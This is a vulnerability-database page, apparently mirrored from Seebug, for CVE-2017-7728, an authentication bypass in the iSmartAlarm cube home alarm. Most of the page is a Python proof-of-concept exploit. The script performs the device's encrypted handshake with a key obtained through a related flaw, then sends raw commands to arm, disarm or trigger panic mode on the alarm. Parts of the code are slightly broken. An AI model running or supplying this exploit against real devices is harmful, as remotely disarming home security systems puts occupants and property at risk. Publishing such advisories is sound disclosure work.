Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Authentication Bypass allows alarm's commands execution in iSmartAlarm(CVE-2017-7728)

🗓️ 08 May 2018 00:00:00Reported by My SeebugType 
seebug
 seebug🔗 www.seebug.org👁 41 Views

Authentication Bypass allows remote execution of alarm commands in iSmartAlarm cube - All (CVE-2017-7728

Related
Code
ReporterTitlePublishedViews
Family
0day.today		iSmartAlarm CubeOne Missing SSL Certificate Validation Vulnerability
13 Jul 201700:00
zdt
0day.today		iSmartAlarm CubeOne Remote Command Execution Exploit
16 Jul 201700:00
zdt
CNVD		iSmartAlarm cube device encryption issue vulnerability
17 Jul 201700:00
cnvd
CNVD		iSmartAlarm cube Device Information Disclosure Vulnerability
10 Oct 201700:00
cnvd
CVE		CVE-2017-7726
11 Jul 201717:00
cve
CVE		CVE-2017-7728
11 Jul 201717:00
cve
Cvelist		CVE-2017-7726
11 Jul 201717:00
cvelist
Cvelist		CVE-2017-7728
11 Jul 201717:00
cvelist
EUVD		EUVD-2017-16701
7 Oct 202500:30
euvd
EUVD		EUVD-2017-16703
7 Oct 202500:30
euvd
Rows per page

                                                #!/usr/bin/python
# auther: Ilia Shnaidman
# @0x496c on Twitter

# python27
import socket
import struct

# - - - - - - -
ISMART_SYN = 'ISAT\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
ISMART_SYN_ACK = 'ISAT\x02\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00'
ISMART_ACK_PREFIX = 'ISAT\x03\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00'
ISMART_SUCCESS_ACK = 'ISAT\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01'
ISMART_ALARM_DISARM = 'ISATP\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x002'
ISMART_ALARM_DISARM_ACK = 'ISATQ\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00200'
ISMART_ALARM_ARM = 'ISATP\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x000'
ISMART_ALARM_ARM_ACK = 'ISATQ\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00000'
ISMART_ALARM_PANIC = 'ISATP\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x003'
ISMART_ALARM_PANIC_ACK = 'ISATQ\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00300'
DELTA = 0x9e3779b9
IP = '1.2.3.4'
ISMART_PORT = 12345
# retrieve ismartalarm key using CVE-2017-7726,
# and search for /GetIpu.ashx api
ISMART_KEY = ""
MTU = 1450
# - - - - - - -

def decrypt_in_place(data,key):
    #data_out = [0,0,0,0]
    key_u = struct.unpack('>IIII', key)
    data_u = struct.unpack('>IIII', data)
    data_u = [i for i in data_u]
    if len(key_u) != 4:
        return None
    if len(data_u) != 4:
        return None
    y = data_u[0]
    sum = (6 + (52/4)) * DELTA
    l = 4
    for i in xrange(19):
        e = (sum >> 2) & 3
        for p in xrange(3,0,-1):
            z = data_u[p-1]
            y = (data_u[p] - ((((z>>5^(y<<2&0xffffffff)) + (y>>3^(z<<4&0xffffffff))) ^ (((sum^y)&0xffffffff) + 
(key_u[(p&3)^e]^z)))&0xffffffff))&0xffffffff
            data_u[p] = y
        z = data_u[l-1]
        y = (data_u[0] - ((((z>>5^(y<<2&0xffffffff)) + (y>>3^(z<<4&0xffffffff))) ^ (((sum^y)&0xffffffff) + 
(key_u[(0&3)^e]^z)))&0xffffffff))&0xffffffff
        data_u[0] = y
        sum = sum - DELTA
    return data_u

def revarr(arr):
    n_arr = [0]*16
    for i in xrange(4):
        n_arr[i] = arr[3-i]
        n_arr[i+4] = arr[7-i]
        n_arr[i+8] = arr[11-i]
        n_arr[i+12] = arr[15-i]
    return "".join(n_arr)

def ismartalarm_connection():
    ismart_so = socket.socket()
    ismart_so.settimeout(5)
    ismart_so.connect((IP, ISMART_PORT))
    ismart_so.send(ISMART_SYN)
    so_recv = ismart_so.recv(MTU)
    if ISMART_SYN_ACK == so_recv[:16]:
        ismart_secret = so_recv[16:]
        key = ISMART_KEY
        data_dec = decrypt_in_place(revarr(ismart_secret), revarr(key))
        data_dec_rev = revarr("".join(["{0:0{1}x}".format(i,8) for i in data_dec]).decode("hex"))
        ismart_so.send("%s%s" % (ISMART_ACK_PREFIX, data_dec_rev))
        so_recv = self.ismart_so.recv(MTU)
        if ISMART_SUCCESS_ACK == so_recv:
            # We are authenticated
            return ismart_so
    return False

def ismart_commands(command):
    # Get authenticated connection to ismartalarm
    ismart_so = ismartalarm_connection()
    if not ismart_so:
        # we failed to authenticate
        return False
    if not command:
        return False
    if "arm" is command:
        print "[+] Sending arm command"
        ismart_so.send(ISMART_ALARM_ARM)
        so_recv = ismart_so.recv(MTU)
        if ISMART_ALARM_ARM_ACK == so_recv:
            print "[!]    Success! iSmart Alarm system is ARMED!"
    elif "disarm" is command:
        print "[+] Sending disarm command"
        ismart_so.send(ISMART_ALARM_DISARM)
        so_recv = ismart_so.recv(MTU)
        if ISMART_ALARM_DISARM_ACK == so_recv:
            print "[!] Success! iSmartAlarm system is disarmed!"
    elif "panic" is command:
        print "[+] Sending panic command, close your ears :)"
        ismart_so.send(ISMART_ALARM_PANIC)
        so_recv = ismart_so.recv(MTU)
        if ISMART_ALARM_PANIC_ACK == so_recv:
            print "[!] Success! iSmartAlarm system is in panic mode!"
    return True

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 May 2018 00:00Current
EPSS0.01159
ismartalarmiotalarm systemauthentication bypassremote executionencryption algorithmxxteacommand execution
41